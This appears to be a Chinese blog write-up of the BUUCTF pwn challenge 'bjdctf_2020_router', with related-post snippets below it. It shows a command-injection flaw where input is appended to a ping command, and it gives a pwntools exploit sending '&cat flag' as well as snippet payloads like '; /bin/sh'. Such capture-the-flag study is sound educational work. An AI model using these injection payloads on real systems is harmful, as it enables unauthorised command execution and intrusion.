bjdctf_2020_router

最新推荐文章于 2025-04-21 21:50:05 发布
原创 最新推荐文章于 2025-04-21 21:50:05 发布 · 685 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

本文解析了一道关于路由器安全挑战的编程题目,通过checksec和IDA的分析揭示了用户输入字符串的执行漏洞,并展示了如何利用stack overflow绕过防护,最终实现catflag文件读取。

bjdctf_2020_router

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,放进IDA中查看,程序逻辑代码都在main()函数中,也是一个菜单类题目
在这里插入图片描述
选项2和4是没有用的,来看看1和3:

  • 1中用户可输入0x10大小的string,程序将这个string用system()执行了???????
  • 3 栈溢出

既然1能直接执行,那就试试直接连上去cat flag

当直接使用r.sendline("cat flag")时,可以看到程序其实时已经调用了系统命令ping
在这里插入图片描述
接下来只需要绕过ping即可,这不随便绕嘛…

r.sendline("&cat flag")
在这里插入图片描述

exp:

from pwn import *

#start 
r = remote("node4.buuoj.cn",26453)
# r = process("../buu/bjdctf_2020_router")

#params

#attack
r.recv()
r.sendline("1")
r.recv()
r.sendline("&cat flag")

r.interactive()
BUUCTF pwn——bjdctf_2020_router
CNS-Enterprise BCC-1701-J
05-09 378
BUUCTF 做题练习
[BUUCTF-pwn]——bjdctf_2020_router
Y_peak的博客
03-16 429
[BUUCTF-pwn]——bjdctf_2020_router 关键漏洞, 如果输入 ; /bin/sh 就会执行system("/bin/sh") 分号是分割符 exploit from pwn import * p = remote("node3.buuoj.cn",27911) p.sendline('1') p.sendafter("Please input the ip address:\n", "; /bin/sh\x00") p.interactive() ...
ctf.show BJDCTF2020——babyrouter
2401_88087539的博客
01-10 314
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
bjdctf-2020-router
m0_73743784的博客
09-01 371
其实知道 Linux 中的命令执行可以用;分隔就会非常简单。
Trace_Router.zip_route_router _router tra_trace_trace router
09-19
标题中的"Trace_Router.zip_route_router _router tra_trace_trace router"暗示了这是一个关于网络路由追踪的软件包,可能是一个用于追踪数据包在网络中路径的工具。描述进一步确认了这一点,指出它是一个实现...
rtl.tar.gz_Verilog router_router _router verilog_router vhdl_rou
09-14
This is RTL of Router by uisng verilog
Using_Linux_As_A_Router.rar_router
09-24
Using Linux As A Router
BJDCTF2020 router
qq_39980610的博客
08-23 358
BJDCTF2020 router
bjdctf_2020_router 1
weixin_74861133的博客
03-10 507
逻辑很简单,一直打印菜单,但仔细看来只有1有用,别的都是迷惑的,1中的功能先是读入一个0x10大小的字符串buf,然后使用strcat函数将buf拼接在dest后面,那这个dest是什么呢,我们先随便输入一个字符串跟据后面的提示想到dest应该是ping,因为ping命令后面什么也不跟会报错。还有一种方法就是上面已经有了dest的值了。
bjdctf_2020_router--buuctf
最新发布
2301_81060697的博客
04-21 373
分号实现命令一行执行
[BUUCTF]PWN——bjdctf_2020_router
mcmuyanga的博客
11-06 1170
bjdctf_2020_router 附件 步骤: 例行检查,64位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 会让我们选择,选择4.root,没什么用,但是注意了,这边选1会执行ping命令,尝试在ping命令后拼接ls,可以看到ls命令也执行了 这边利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行 3 . 利用这点,远程连接,尝试读出flag ...
【BUUCTF】bjdctf_2020_router
m0_51251108的博客
12-31 399
【BUUCTF】bjdctf_2020_router linux里面命令可以用;或&分隔,接下来就可以输我们要的命令了
BUUCTF-bjdctf_2020_router-WP
Rt1Text的博客
02-12 723
64位。
BJDCTF2020 babyrouter
qq_39980610的博客
08-22 378
BJDCTF2020 babyrouter
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 3602
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
BJDCTF-2020-WRITEUP---TiKi小组
pone2233的博客
03-23 2616
title: BJDCTF 2020 刷题记录 categories: CTF tags: BJDCTF CTF2020 BJDCTF Web duangShell 根据提示,输入.index.php.swp下载到源码。 之后在linux内输入vim -r index.php.swp即可看到源码 <!DOCTYPE html> <html lang="en"> &...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值